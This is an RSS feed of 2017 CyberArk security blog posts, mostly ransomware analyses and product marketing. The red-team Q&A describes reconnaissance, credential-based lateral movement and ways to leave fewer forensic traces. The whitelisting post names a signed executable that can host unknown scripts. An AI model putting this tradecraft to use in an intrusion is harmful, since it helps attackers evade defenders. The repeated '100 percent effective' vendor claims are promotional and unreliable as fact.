WannaCry Ransomware: A Brief Q&A with a CyberArk Labs Researcher https://www.cyberark.com/blog/wannacry-ransomware-brief-qa-cyberark-labs-researcher/ Mon, 07 Aug 2017 13:57:20 +0000 https://www.cyberark.com/?p=16055

In May, we offered a 30 minute webcast focused on deconstructing the WannaCry ransomware attack. Led by CyberArk Labs Researcher Shaked Reiner, the webcast delved into specifics of the attack, as well as proven methods organizations can implement to prevent WannaCry’s ability to spread through networks and encrypt system data. We’ve compiled some of the questions attendees asked Shaked during the session, and the highlights are shared here:

Q: Can you describe the propagation technique used by WannaCry?

A: The WannaCry ransomware’s technique is based upon code originally developed by the NSA and leaked by the hacker group known as Shadow Brokers. It uses a variant of the Shadow Brokers’ leaked exploit and utilizes strong encryption on files such as documents, images and videos. The ransomware was able to spread at an unprecedented rate via a sophisticated, built-in “worm” capability. Additionally, it specifically targets the MS17-010 SMB vulnerability in Microsoft systems that many people had left unpatched, and therefore, exposed.

Q: Which account does WannaCry use to install itself, and if the user does not have administrative privileges, shouldn’t it disallow WannaCry to install itself?

A: This specific strain of ransomware is special in that aspect. Administrative privileges are not required to execute the initial infection. However, in order to propagate throughout the organization’s network, it needs to escalate privileges through the Microsoft vulnerability described above. After successfully exploiting this vulnerability, the ransomware has access to the highest tier of privileged credentials, enabling it run code in SYSTEM user context. WannaCry is then able to operate in an offline environment, encrypting the user’s files with an RSA-2048 key pair. After the encryption process, the ransomware demands $300-$600 in Bitcoin to decrypt the files.

Q: Why can’t Bitcoin payments be tracked?

A:  Bitcoin is often described as an anonymous currency because it is possible to send and receive Bitcoins without sharing any personally identifying information. It works by leveraging digital wallets untethered to a central management or processing system. This allows each digital wallet to operate independently, and it makes tracking and identification of the wallet holder incredibly difficult.

Q: How is it possible to detect and block such an attack?

A: Our CyberArk Labs team conducts ransomware testing daily to help organizations better prepare for such attacks. Based upon tests of more than 600,000 ransomware samples (including WannaCry), the team has found that the combination of enforcing least privilege on endpoints and application greylisting control is 100 percent effective in preventing ransomware in general, and WannaCry specifically, from encrypting files.

CyberArk Endpoint Privilege Manager helps organizations remove common barriers to enforcing least privilege, such as user productivity loss and increased burden on IT teams. It also allows organizations to block and contain attacks at the endpoint, reducing the risk of information being stolen or encrypted and held for ransom. A combination of privilege security and application control reduces the risk of malware infection. Unknown applications can run in a restricted mode to contain threats while maintaining productivity, and behavioral analysis identifies and blocks credential theft attempts. These critical prevention and protection technologies are deployed as a single agent to strengthen existing endpoint security.

Q: How difficult is it to create malware such as WannaCry?

A. It’s important to separate the two components of this malware to answer this question. In the case of WannaCry, the ransomware component itself was very ordinary – there are a few open-source ransomwares widely available on the internet and one does not need advanced programming knowledge to figure out how to compile one. What makes WannaCry unique and viral in nature is the highly sophisticated worm component that allows it to spread as quickly as possible to as many machines as possible. It’s likely two malware authors were involved in the creation of WannaCry, as the infection component is so advanced, while the ransomware itself is not overly sophisticated.

Q: Are there any additional tools from the NSA leak that could lead to another attack of this magnitude and scale?

A: Yes. The Shadow Brokers group offer a monthly subscription program that promises more data will be released from the NSA leak. It’s important to note that the previous leak did not contain any exploits’ source code, so WannaCry was constructed by fully reverse-engineering the software that was released. This indicates that the attacker responsible for the WannaCry worm component was extremely sophisticated, as noted previously. The NSA leak most certainly contained more tools that savvy hackers may leverage to wreak additional, future havoc and harm.

To learn more about the WannaCry attack, we invite you to read our Labs Team’s full analysis, as well as five ways to mitigate ransomware risk.

]]>
Privileged Access Management: A Matrix Approach for Account Ranking and Prioritization https://www.cyberark.com/blog/privileged-access-management-matrix-approach-account-ranking-prioritization/ Wed, 02 Aug 2017 14:10:59 +0000 https://www.cyberark.com/?p=16027

Throughout the course of my six years in helping KPMG clients with their Privileged Access Management programs, there has rarely been a simple answer to the critical questions of exactly which privileged accounts in an environment should be integrated first (e.g., application/infrastructure/personal accounts), and exactly how we should control each type of privileged account. The ways an organization can control privileged accounts using a solution like CyberArk can vary greatly (e.g. vaulting, password rotation, brokering, etc.).

A common approach to password management includes treating all vaulted credentials with the same level control measures; this is typically a symptom that indicates a lack of a risk-based approach to assigning criticality to accounts. Alternatively, we also see cases of wild inconsistencies in the way passwords are managed, typically leaving it up to the individual platform owners to pick and choose the right security controls for them. This typically an indication of a lack of defined PAM standards that can be applied enterprise-wide. When developing strategies and roadmaps for KPMG clients, our teams apply an “Account Criticality Matrix” to help answer these questions. This matrix is designed to help standardize the way we rate and weigh the criticality of a given account.  It includes a set of predefined criteria that we tailor to meet the unique needs of each organization. Example criteria in the Account Criticality Matrix include:

*   Number of individuals that have access to a given privileged credential
*   Frequency of account usage
*   Potential to access sensitive data
*   Scope of privilege across single/multiple systems or platforms
*   Control level granted

Based on the numerical scoring derived from the Account Criticality Matrix, we then begin to build a profile of what an organization would consider a “high-risk” account versus a “low-risk” account.  This profile helps on numerous fronts.  First, it allows for consideration of account types that typically would not be considered as true “privileged” accounts.  For example, many application or service accounts are inadvertently excluded from management in organizations due to a lack of understanding of enterprise privileged account definitions by the application owner.  In the absence of pre-defined account prioritization criteria, those owners are left to decide what constitutes a “privileged” account or not.  Many will opt for the latter without prescribed guidance.  The matrix will allow an organization to take any account type and provide a standardized metric to determine whether it meets the criteria to be integrated into CyberArk.

The second benefit is the standardization of account controls across the organization based on the calculated account criticality.  Depending on licensing and hardware limitations, recording all privileged accounts may not be feasible.  Based on a pre-defined policy, an organization could mandate that only “high” rated accounts require dual control and PSM recording, but periodic password rotations of “medium” rated credentials are sufficient.

Thirdly, combining knowledge of “high” severity accounts and implementation effort can provide a window to prioritization of the path of integration.  When various stakeholders ask why the decision was made to start with default local accounts first and not their specialized application, you can point them not only to the fact that those accounts rated as high based on the user base, scope of privilege, and access granted, but also because the implementation effort was lowest for those accounts.


Art Chaisiriwatanasai is a Director within KPMG’s Chicago office and is a member of their IT Advisory – Cyber practice. Art has in-depth experience in information security focusing on privileged access management, security operation center implementations, vulnerability management, risk assessment, and incident response initiatives.


Some or all of the services described herein may not be permissible for KPMG audit clients and their affiliates.

© 2017 KPMG LLP, a Delaware limited liability partnership and the U.S. member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative (“KPMG International”), a Swiss entity. All rights reserved. [Printed in the US].The KPMG name and logo are registered trademarks or trademarks of KPMG International. The information contained herein is of a general nature and is not intended to address the circumstances of any particular individual or entity. Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future. No one should act upon such information without appropriate professional advice after a thorough examination of the particular situation.

]]>
Five Things to Know about Ransomware https://www.cyberark.com/blog/five-things-know-ransomware/ Mon, 31 Jul 2017 13:10:05 +0000 https://www.cyberark.com/?p=16003

With WannaCry barely in the rear view mirror, ransomware was back in the spotlight with a new malware dubbed NotPetya. We can expect to see new ransomware strains as advanced attackers continue to evolve their tactics, and the ramifications on business will be significant if proactive measures are not taken. In previously posts, we’ve deconstructed ransomware and offered mitigation tips. To protect your organization, it’s important to be informed and have baseline knowledge.

Here are five things to know about ransomware:

  1. What is ransomware? Ransomware is a type of malicious software, or malware, that denies access to files and data until a ransom is paid. There are two distinct types of ransomware. The most common is crypto ransomware, which encrypts sensitive data and files until a ransom is paid. The other type, locker ransomware, locks a device, completely preventing the victim from using it. In most cases, ransomware encrypts personal files, blocking users from accessing them. Victims are given instructions on how to pay the requested ransom, and only after doing so, are they given a decryption tool that will unlock the files.
  2. How does ransomware encryption work? A well-designed ransomware strain will typically use an asymmetric encryption algorithm, which leverages a pair of keys – one public and one private. The data that is encrypted with the public key can only be unlocked by this matching private key and vice versa.
  3. How do victims pay cyber ransoms? Ransoms are typically paid in the cryptocurrency Bitcoin due to its anonymity and difficulty to trace.
  4. How much is a typical ransom? Requested ransom amounts can vary wildly. In the WannaCry attacks, victims were asked to pay between $300 to $600 via BitCoin to have their files unlocked. This may not seem like much, but it’s important to consider the other, more severe, costs resulting from such attacks due to downtime caused by lack of access to systems. Shockingly, it was recently reported that South Korean web hosting provider paid $1 million in bitcoins to hackers after a Linux ransomware infected its servers and encrypted the websites data hosted on them.  A big jump from the amount the Hollywood Presbyterian Medical Center reportedly paid last year.
  5. How do I mitigate risk? Ransomware prevention measures can seem particularly daunting as administrator rights are not always required for some of today’s advanced strains of malware to compromise an end users’ machine and infect the endpoint. This means that while privilege management can play a role in mitigating risks, many strains of ransomware can encrypt data using standard user rights. So even if an organization has removed local administrator rights, this doesn’t necessarily mitigate the risk. However, testing at CyberArk Labs demonstrated that application control, including greylisting, coupled with the removal of local administrator rights, was 100 percent effective in preventing ransomware from encrypting files.

Watch this CyberArk Brief and learn how to proactively protect against ransomware.

 

 

]]>
The Art of the Ethical Hack: A Q&A with CyberArk’s Head of Red Team Services https://www.cyberark.com/blog/art-ethical-hack-qa-cyberarks-red-team-lead/ Wed, 26 Jul 2017 14:45:16 +0000 https://www.cyberark.com/?p=15941

Today’s highly motivated cyber attackers continually hone their skills. After all, their job is to know your network better than you do, exploiting even the smallest vulnerability to carry out a mission. In order to stay a step ahead of advanced maneuvers, it’s critical to adopt an attacker’s mindset. For many organizations, a Red Team plays an integral role in continuously improving security practices.

CyberArk Red Team services provide a safe way for security operations teams to test their ability to effectively defend against cyber attacks. The CyberArk Red Team uses a variety of tactics, techniques and procedures (TTPs) that are used in real world attacks to help clients uncover vulnerabilities, test security procedures and identify areas of improvement.

We recently spoke with Shay Nahari, our Head of Red Team Services, to learn more about the process and goals of simulated attacks. Here are some highlights from our discussion. Additional information about the Red Team is available here.

Q: Why do organizations request adversary simulation?

A: Organizations hire us to test their teams’ ability to detect and respond to targeted attacks against their infrastructure. By thinking and acting like real attackers, we give our customers a way to face a real attack and learn from it.

Q: How do you prepare for a simulation?

A: Before any simulation, we focus on reconnaissance, trying to learn as much as we can about the target organization, its employees and the security measures in place. To do so, we employ a number of methods, such as collecting information from public sources like LinkedIn, Shodan and other lesser-known sources. Armed with this information, we typically utilize custom malware to evade their security measures, then either exploit a vulnerability, an external server or use social engineering to gain an initial foothold in the network.

Q: How easy is it to breach a typical network? And what do you do once you get inside?

First, there are always ways to get inside a network. That’s why it’s important for organizations to change their mindsets around cyber attacks. It’s not a matter of “if” but a matter of “when.” Organizations have to adopt an “assumed breach” mindset – assume that one (or more) of their resources is already compromised. 

Once we’re inside, we always try to exploit built-in trust as a first step. Trust usually translates to some type of credential – passwords, hashes, SSH keys, tickets.  We can abuse this trust to impersonate real users and typical user behavior, which makes it very hard for the defenders to detect the intrusion.

Q: What happens after you breach a network? 

A: Once we have a foothold in the network, we take time to familiarize ourselves with our surroundings. At this point, most of the information we need can be gathered by abusing inherent trusts in the target environment, without necessarily requiring admin rights. For example, with standard user privileges, we can query the Active Directory and learn the network topology, map out users and group membership, and also see what privileges users have within the network. We can see their last login time, where they logged in to, and with what privileges.

At this point, we can build a map of the network and create an attack path. During these simulations, we ideally only target internal resources that can either help us escalate privileges or that have the access to the “crown jewel” we’re after – whether it’s financial, intellectual property or something else.

In Windows environments, AD contains a lot of useful information. Even if my “crown jewels” aren’t in the Windows environment, user group and system information can be extremely helpful in mapping out the most direct attack path.

Q: What happens after you establish an attack path?

A: Once we have an attack path, we need to start pivoting in the network. Before we can do this, we need to escalate privileges or abuse some sort of inherit trust on the local target. Once we do that, we can start looking for passwords, hashes, SSH keys, tokens, Kerberos tickets, or anything else that we can leverage for pivoting. Credentials are everywhere. Unless you maintain very strict operational security, one remote login can allow me to take over your entire AD forest.

Next, we try to “live off the land” – which means we try to abuse native tools in order to reuse the credentials we’ve found. With every new system we compromise, we repeat the process, which in turn, allows us to gain access to another set of machines, until we’re able to gain domain admin. Once we achieve domain admin, the main goal is to persist and stay hidden in the network until we can reach the “crown jewels.”

Q: How do you stay hidden?

We try to make sure our actions generate the fewest and smallest footprints possible. For example, WMI or PowerShell remoting are much better options during lateral movement because they leave much less forensic evidence than, let’s say, PSexec.

We leverage native tools to avoid defensive tactics. For example, PowerShell gives you access to the entire .NET language, and other built in tools allow you to compile code natively on Windows without introducing external binaries on the system. By avoiding touching disk and injecting into memory, you can make hunting and IR much harder for the defender.

Q: So how can organizations stop this?

A: It’s important for organizations is to have an “assume breach” mindset regarding their security posture. Assume your internal network is as hostile as your external network.  One major way organizations can reduce risk is by limiting internal users’ abilities to gather information from AD. In most cases, you can limit what types of information regular users are able to gather. If you can limit what attackers can learn, it’s much harder for them (and us!) to build an attack path.

Additionally, use two-factor authentication everywhere you can. Rotate and randomize passwords on a regular basis to make cracking them time-consuming for the attacker.

Avoid giving standard users local admin rights, make local admin accounts unique, and keep privileged accounts to a bare minimum. By doing that, you’re significantly raising the bar and making lateral movement much harder for the attacker.

It’s also important to understand what is normally running on your network – and create baseline of internal traffic. Without a baseline, you don’t know if what you are seeing is suspicious or not. Lastly block machine-to machine-communication, to the greatest extent possible.

Note: For additional Red Team insights, read CyberArk’s Threat Research blog.

]]>
Circumventing Application Whitelisting and Misplaced Trust https://www.cyberark.com/blog/circumventing-application-whitelisting-misplaced-trust/ Mon, 24 Jul 2017 16:49:12 +0000 https://www.cyberark.com/?p=15880

Application whitelisting has been an advantageous technique to harden an organization’s endpoints against malware, unlicensed software, and other unknown or unauthorized software. When properly configured, whitelisting certainly has its benefits as it controls which applications and scripts can run and execute. However, traditional whitelisting technologies will limit the user to a binary ‘allow/deny’ mode. This approach may work just fine for smaller organizations that have only a handful of applications, but in large enterprises, this can be extremely challenging to support. The organization would need to either ‘allow the unknown’ and open themselves up to unnecessary risk – or – ‘deny the unknown’ and deal with disgruntled users and operational issues.

Attackers increasingly have sophisticated techniques. If an organization has something of significant value to attackers, then you can certainly expect that they’ll find ways to circumvent application whitelisting policies. Heuristic-based detection and scanning methods can help supplement a risk mitigation strategy against attacks initiated by these bypassing techniques – but – is that really enough to keep up with the very skilled and sophisticated cyber attackers that we see today? A defense in depth strategy at the endpoint with multiple layers of security controls is needed.

Misplaced Trust

When an organization leverages only the free and rudimentary tools for IT administrators to define which applications can and cannot be executed, they inadvertently become more susceptible to attacks that originate on the endpoint. Furthermore, trusting all the binaries that are signed off by the operating system comes with a certain level of risk. Over the years, researchers have come across many executable files that have the ability to very easily bypass some of these basic tools with relatively simple commands and run arbitrary scripts. Some of which were even able to fetch files and communicate over the internetnot good! These free tools can be a great foundational resource but additional security controls are needed to better improve an organization’s security posture.

Reality Meets Application Control

Expecting your IT administrator to be aware of all the applications that exist within a larger organization is unrealistic and nearly impossible in practice. Moreover, analyzing these applications and identifying which should be allowed to execute and which should be denied is equally as challenging. When an organization enables an application control solution, it often takes a whitelisting approach and therefore must specify exactly what is to be trusted. The most common tactic is to trust every binary that is signed off by the operating system vendor – but – not all processes (e.g. child processes) that originated from the trusted process are considered to be fully trustworthy. This is particularly important when you consider the techniques of modern malware that leverage tools like PowerShell to pull code (e.g. Mimikatz) from online source code repositories and execute in memory – thereby bypassing many Anti-Virus, malware detection or whitelisting solutions. Being limited to only ‘allowing’ or ‘denying’ within PowerShell is certainly not the ideal situation.

A more proactive approach is to provide application “greylisting” which allows lesser known applications to run in a restricted mode based on policy whereby they are allowed to run but are for example, denied access to the internet, unable to spawn processes and forced to run at a lower privilege. Operating in a restricted mode allows flexibility to the end user but prevents the applications from accessing corporate resources and system resources as part of a targeted attack.

CyberArk Provides Defense in Depth for Application Control

CyberArk Endpoint Privilege Manager delivers several layers of security beyond what some of the basic, UAC software restricting tools can provide and in so doing is aligned with guidance from NIST Special Publication 800-167, Guide to Application Whitelisting. With CyberArk Endpoint Privilege Manager, users can define whitelists and greylists with flexible rules based upon any combination of various file parameters and not just those based on the file hash, path or publisher (which can easily be sidestepped by a few simple actions). With Endpoint Privilege Manager, an IT organization can provide the level of granularity that allows for specific users on specific machines to run PowerShell, with a pre-defined level of privilege (e.g. standard user, specific privileges [i.e. custom token], etc.).

Additionally, Endpoint Privilege Manager also supports a full range of trusted sources, providing the ability to manage a very large number of the executables within larger-sized organizations (e.g. any file distributed by a corporate software distribution system like System Center Configuration Manager could be defined as a trusted source just by one simple rule). Lastly, this solution provides deep integrations with third-party file reputation systems to help IT administrators determine legitimate applications versus what’s considered to be potentially harmful. The image below shows Endpoint Privilege Manager blocking an unknown .vbs script from running on the endpoint, by using Bginfo.exe (a known executable file signed by the OS vendor that can bypass whitelisting) as the executable host:

Minimizing the endpoint attack surface is top of mind for all IT Security teams and taking a layered approach in securing your endpoints by coupling both privilege management and application control is an essential step in stopping common endpoint attack vectors that organizations often fall victim to.  Our CyberArk Labs Team has demonstrated that a combination of privilege management and application control is 100% effective in protecting against both ransomware and unknown malware.

To learn more about how CyberArk solutions can block and contain threats at the endpoint, download the Endpoint Privilege Manager Solution Brief or request a demo.

]]>
Address SWIFT Customer Security Controls Framework with CyberArk https://www.cyberark.com/blog/address-swift-customer-security-controls-framework-cyberark/ Mon, 17 Jul 2017 15:13:29 +0000 https://www.cyberark.com/?p=15688

The Society of Worldwide Interbank Financial Telecommunication (SWIFT) provides a community of global financial institutions the ability to exchange sensitive information relating to international financial transactions. This vast network—over 11,000 customers across 200+ countries—has become an attractive, high-value target for cyber attackers, as evidenced by high-profile breaches including the infamous Bangladesh Central Bank heist. By capturing legitimate SWIFT operator credentials while employing increasingly sophisticated hacking techniques, attackers continue to pilfer hundreds of millions from banks around the world.

Protecting these credentials from reaching the hands of criminals is an essential step in preventing future attacks. To that end, SWIFT’s Customer Security Programme has established a secure framework and baseline of accountability for customers of SWIFT. This framework has a strong emphasis on privileged account security. Mandatory and advisory security controls must be implemented across the community, and organizations must prove compliance with these regulations by January 18, 2018.

The SWIFT security framework is comprised of 27 controls based on three overarching objectives, and there are about five months remaining to prove compliance. Fortunately, CyberArk customers can address a majority of these controls. CyberArk provides the capabilities needed to meet requirements around securing the organization’s environment, knowing “who” and “what” has access to critical systems and applications as well as detecting and responding to high-risk activity in operator sessions. Following is a high-level look at how CyberArk can help organizations to meet these core objectives:

Secure Your Environment: Risk comes from outside and within—determined, malicious “outsiders” and careless or disgruntled “insiders.” Either can wreak havoc on a financial institution. Unmanaged privileged credentials and accounts are the common vulnerability in both cases. The CyberArk Privileged Account Security Solution can protect and control access to critical systems and infrastructure within a local SWIFT environment. By removing local administrative rights and using CyberArk Endpoint Privilege Manager, organizations can provide users with non-administrative access and on-demand session elevation when needed based on defined policies. Multiple layers of built-in security serve to protect all privileged account operator credentials, including passwords and SSH keys (which may be used to access critical UNIX/Linux operating systems).

Know and Limit Access: The CyberArk Privileged Session Manager enables organizations to isolate, monitor, record and control privileged sessions on critical systems. The solution acts as a jump server and single access control point enabling organizations to have a “secure zone” to protect the local SWIFT infrastructure. Real-time privilege session monitoring enables security teams to detect suspicious activity as soon as it occurs and remotely terminate the session to minimize any potential damage. Additionally, searchable audit logs and session recordings are stored in a tamper-proof vault to prevent privileged users from editing or deleting their history. Security and audit teams can easily review these recordings and audit logs to locate the exact moment an event occurred and gain a clear understanding of the scope and severity of an incident.

Detect and Respond: Attackers target and compromise legitimate, trusted credentials within the network. This makes detecting their abuse a serious challenge when attempting to detect credential theft attacks. Many institutions also struggle to pinpoint attempts to bypass enforced controls by internal or external threat actors. To help overcome these challenges, CyberArk Privileged Threat Analytics implements detection capabilities around the abuse, misuse and theft attacks on privileged credentials. When combined with the CyberArk Privileged Account Security Solution, CyberArk can flag high-risk, anomalous activity within local SWIFT environments with a fully detailed and searchable audit trail of privileged activity.

To learn more about how CyberArk can help your organization to prepare for the January 2018 SWIFT security framework compliance deadline, check out the webinar replay ‘Fast Track to SWIFT Compliance

 

]]>
CyberArk Celebrates 2017 Americas Partner Excellence Award Winners https://www.cyberark.com/blog/cyberark-celebrates-2017-americas-partner-excellence-award-winners/ Tue, 11 Jul 2017 13:34:12 +0000 https://www.cyberark.com/?p=15469

Last night we announced winners of the CyberArk 2017 Americas Partner Excellence Awards. Partners were recognized in a ceremony at the 11th annual CyberArk Impact Americas Summit 2017, the world’s largest event for privileged account security advocates.

These awards celebrate top CyberArk channel, systems integrator and solution provider partners in the United States, Canada and Latin America. These partners have demonstrated strengths across a variety of categories including excellence in cyber security innovation, commitment to training and skills development, and driving customer success with market-leading privileged account security solutions to protect against advanced threats.

Forward-looking organizations that want to proactively protect against damaging cyber attacks continue to turn to CyberArk and its partners to implement the most reliable, comprehensive cyber security solutions available on the market today. The CyberArk Americas Partner Excellence Awards celebrate established and emerging partners that are setting the bar for cyber security innovation and customer success.

The CyberArk 2017 Americas Partner Excellence Award categories and winners are:

United States

  • Partner of the Year 2017 Americas: Optiv
  • Growth Partner 2017 Americas: Sirius Computer Solutions
  • New Business Leader 2017 Americas: Carahsoft
  • Global Systems Integrator 2017 Americas: PwC
  • Innovative Solution Partner 2017 Americas: SecureITSource
  • DevOps Partner 2017 Americas: ShadowSoft
  • Best Newcomer 2017 Americas: Mantech

Canada

  • Best New Partner of the Year 2017 Canada: Herjavec Group
  • Best Technology Partner of the Year 2017 Canada: IAM Concepts

 Latin America

  • Partner of the Year 2017 MCLA (Multi-Country Latin America): Digiware
  • Best Newcomer 2017 MCLA (Multi-Country Latin America): Cortelco Systems
  • Partner of the Year Brazil/Argentina: EZ Security
  • Best Newcomer 2017 Brazil/Argentina: Agility Networks
  • Partner of the Year 2017 Mexico: ARAME
  • Best Newcomer 2017 Mexico: Arteria Comunicaciones

CyberArk Impact 2017 features record-breaking attendance with more than 1,000 customers and partners that are driving privileged account security as a business imperative. The event offers an unparalleled opportunity for education, networking and peer-to-peer knowledge exchange among forward-thinking security practitioners.

For more information, read about the CyberArk Global Partner Program.

]]>
The NotPetya Global Pandemic – CyberArk Labs Analysis https://www.cyberark.com/blog/notpetya-global-pandemic-cyberark-labs-analysis/ Wed, 28 Jun 2017 19:05:16 +0000 https://www.cyberark.com/blog//

In May 2017, WannaCry took advantage of an exploit in the Windows operating system to usher in a cyber security pandemic – ransomware that can spread its infection like a traditional worm. The results were catastrophic, with some damage estimates reaching up to more than $4 billion.

Yesterday, a new malware dubbed NotPetya emerged as the driving force behind another devastating global incident – one that will likely surpass WannaCry in terms of damage caused. While there are still unknowns in terms of who unleashed the malware and the root motivations, CyberArk Labs has downloaded multiple samples of the malware for analysis.

Here’s what we know thus far about the malware and its progress from infection to global ransomware pandemic.

Infection Point – Ukraine

On June 27th, a massive ransomware attack was initiated in coordinated fashion in a large number of Ukraine Government offices and large enterprises.

This first wave was initiated by attackers that were already on the targeted networks. These attackers were on the network for some time and used this reconnaissance time to plan and coordinate the attack for maximum effectiveness.

The attackers allegedly found a vulnerability in software that is widely used in Ukrainian government facilities. Based on initial analysis by CyberArk Labs, in this initial wave, NotPetya appeared to be sparing endpoints that use a US English-only keyboard. This seemingly self-imposed restriction has been seen in nation state attacks.

Supply Chain Vulnerability: This highlights that attackers continue to infiltrate organizations by targeting third-party partners connected to target networks.

The initial attack was incredibly well-timed and organized – the majority of the targeted systems crashed within the first hour of attack launch.

Once NotPetya gained this foothold inside organizations, it spread using the same incredibly effective method as WannaCry – using the “eternalblue” SMB vulnerability in Microsoft systems. CyberArk Labs also confirmed that NotPetya has a built-in Mimikatz module, designed to steal credentials and facilitate lateral movement across an organization, infecting additional machines.

The credential theft element is important – because this means that even organizations that patched the “eternalblue” SMB vulnerability in Microsoft systems are still vulnerable.

Forming the Global Pandemic

While the initial attack targeted Ukrainian government offices and businesses, subsequent waves of the attack appeared to hit Russia and took off globally.

After the initial infection, the malware spread through traditional means – phishing emails. Random targets across the globe were sent targeted phishing emails that executed the ransomware after recipients clicked on the attached files or links.

Because the ransomware was introduced into networks via phishing – as noted above, even organizations that patched the eternalblue vulnerability were exposed. This ransomware was not stoppable at the perimeter.

Once a recipient clicked on the malicious email, a binary file was dropped onto the targeted machine that checked the endpoint for local administrative rights.

If there were no admin rights on the device to exploit, the ransomware simply died at that point.

If the ransomware was able to steal admin rights, it modified the Master Boot Record (MBR) and installed a new boot partition. The Mimikatz module then kicked in to steal additional credentials to facilitate lateral movement.

This is a critical aspect of the ransomware spread, as NotPetya sought additional machines to infect inside organizations. If the organization failed to patch the enteralblue vulnerability, the ransomware propagated via that vector.

This was the best and fastest way for NotPetya to spread, because it enables the ransomware to be executed in system privileges in the next machine, without the need for credential theft.

While still considered a best practice, patching is NOT enough to stop NotPetya. If a system was patched, the ransomware used the credentials stolen by the Mimikatz module to find vulnerable machines and use the credentials with built-in PSexec.

 Countdown to Chaos

Once the ransomware spread to machines across an organization, it was designed to wait a random amount of time (10 – 60 minutes) before rebooting the machine.

This triggered the slim boot loader, encrypting the Master Boot Loader instead of documents and applications. This is why the malware was so damaging – it prevented users from rebooting their machines.

The result was organizational chaos – disrupting major businesses in Ukraine, India, US, Russia and more.

Protecting Your Organization

As with previous ransomware outbreaks, a combination of least privilege and application control policies on endpoints and servers can mitigate the risk of malware like NotPetya spreading from its initial infection point.

When tested in the CyberArk Lab, the combination of least privilege and application greylisting controls proved 100 percent effective in preventing NotPetya from executing.

CyberArk strongly urges every organization to take these immediate steps:

  • Backup Important Data – Immediately: This should be table-stakes best practices, but every organization should start by making sure all critical data is backed up.
  • Follow the Least Privilege Principle:Always configure access controls including file, directory and network sharing permissions with the least privilege principle in mind. Most users do not need admin privileges to do their required jobs on their corporate endpoint devices, so user access should remain at the minimal level that will allow normal functioning.
    • Note: This does NOT make you immune to NotPetya and ransomware – but it effectively stops the ransomware from spreading and carrying our malicious tasks. Endpoints can be replaced – organizational shut down can stop business.
  • Apply Application Control: Controlling which executables have access to your files can also contribute to defensive efforts. For example, if you put the PowerPoint executable in a whitelist as the only executable that has write access to your presentation files, then if a ransomware’s executable tries to encrypt and overwrite the files, it will be denied (as it is not on the “approved” whitelist). It’s important to also establish policies based on trusts that will protect these “trusted” or whitelisted applications.
  • Disable SMB v1 and Apply Patches: Organizations that failed to patch earlier were open targets to NotPeyta. Not patching is inexcusable at this point. Organizations should immediately disable the outdated Microsoft SMB protocol version 1 or simply apply the patch MS17-010 that Microsoft released a few months ago.
  • Block Internet Access: The Microsoft SMB protocol is meant to be internal, so your network should not be open to SMB packets from the internet. Implementing port filtering to block all versions of SMB at the network boundary is also an important preventative measure.

CyberArk Labs continues to seek new variants of this ransomware and will share the results of additional testing and analysis.

]]>
5 Ways to Address the General Data Protection Regulation (GDPR) With CyberArk https://www.cyberark.com/blog/5-ways-address-general-data-protection-regulation-gdpr-cyberark/ Mon, 26 Jun 2017 14:43:26 +0000 https://www.cyberark.com/blog//

On May 25, 2018, the General Data Protection Regulation (GDPR) will be enforced across the European Union (EU). This regulation aims to extend the rights of individuals residing within the EU to better control and protect the use of their personal data in the evolving digital landscape.  It’s also an attempt to strengthen, simplify and harmonize the data protection and privacy laws across Europe. GDPR requires any organization whose business involves either collecting or processing any EU citizen’s personal data – not just those that are located within the member states of the EU – to maintain compliance. Non-compliance risks both steep financial penalties and reputational damages. The CyberArk Privileged Account Security Solution protects the privileged credentials that enable access to the systems and applications that contain and process highly sensitive personal data.

Here are five ways CyberArk solutions can help organizations address GDPR:

  1. Protect and Monitor Access to Sensitive Personal Data

Attackers and non-authorized users target privileged accounts as a means to gain access to critical systems and applications that hold sensitive personal data. CyberArk enables organizations to perform live monitoring and session recording to quickly identify unauthorized, suspicious and high-risk activity. With CyberArk, organizations can control privileged access to systems and applications that hold and process personal data, which is essential for your GDPR data protection program.

  1. Secure Processing through Least Privilege Enforcement

Organizations are required to limit the risk of unlawful destruction, loss, alteration, unauthorized disclosure of, and most importantly – access – to personal data. CyberArk provides a unified access control solution to regulate and monitor the commands super-users can run based on their roles and the specific tasks they manage. The solution limits the use of privileged rights within the organization, enables them to segregate administrator duties and enforces least privilege policies for their super-users.

  1. Detect and Respond to Breaches Early in the Attack Lifecycle

GDPR requires unauthorized access to personal data to be reported within 72 hours of detection. CyberArk provides threat detection solutions that will not only detect malicious activity in real-time, but can contain the threat at the earliest stage of the attack lifecycle – before the attacker is able to gain access to personal data. The solution features an analytics engine that leverages statistical modeling, machine learning, user behavior analytics, and deterministic algorithms to detect attackers and malicious insiders navigating the network. As a result, incident response teams now have the additional time they need to stop the attacker before they get to their end target.

  1. Security Controls and Procedures Risk Assessment

CyberArk has a dedicated Red Team that provides a safe way for security operations teams to test their ability to effectively defend against cyber attacks. This team uses a variety of tactics, techniques and procedures used in real world attacks to help clients measure the risk to critical assets, uncover vulnerabilities, test security procedures and identify areas of improvement.  This wide-ranging assessment will help demonstrate if the security measures and mechanisms in place can help guarantee the protection of personal data and demonstrate GDPR.

  1. Minimize Risk Against Non-Compliance

In the event of a breach, each organization and its business partners need to be able to prove that they’ve met their obligations – and in some cases – determine which party is at fault. So the question then becomes: who has access and to what systems and applications do they have access? CyberArk’s free Discovery and Audit (DNA) tool helps organizations discover privileged user and application accounts in their environments, including those used by third-party users. The tool produces a full report including a list of accounts and associated credentials as well as current account status with regard to your security policies. Furthermore, CyberArk solutions provide detailed logs and audit trails that capture privileged account activity for both internal users and third-party vendors alike. The log files are stored securely in order to prevent manipulation. Audit trails are searchable to aid in the event of forensic investigation or litigation from data subjects.

The core of GDPR is all about data protection by design and by default – CyberArk is all about security by design and by default. By locking down access to sensitive systems and applications, you secure control of who and what has access to personal data. Research shows that most organizations will not be compliant when GDPR officially goes into effect. Given the potential fines upwards of €20 million, impact on customer loyalty, future loss of revenue, brand damage, etc., it makes good business sense to address GDPR requirements urgently. For organizations that have a strong privileged access management strategy in place today, this conversation is already top of mind for CISOs, compliance officers, legal and IT professionals.

Learn how CyberArk can help support compliance with GDPR by downloading this Solution Brief.

 

]]>
CyberArk Labs Identifies “GhostHook” Technique That Bypasses PatchGuard in Windows OS https://www.cyberark.com/blog/cyberark-labs-identifies-ghosthook-technique-bypasses-patchguard-windows-os/ Thu, 22 Jun 2017 15:33:06 +0000 https://www.cyberark.com/blog//

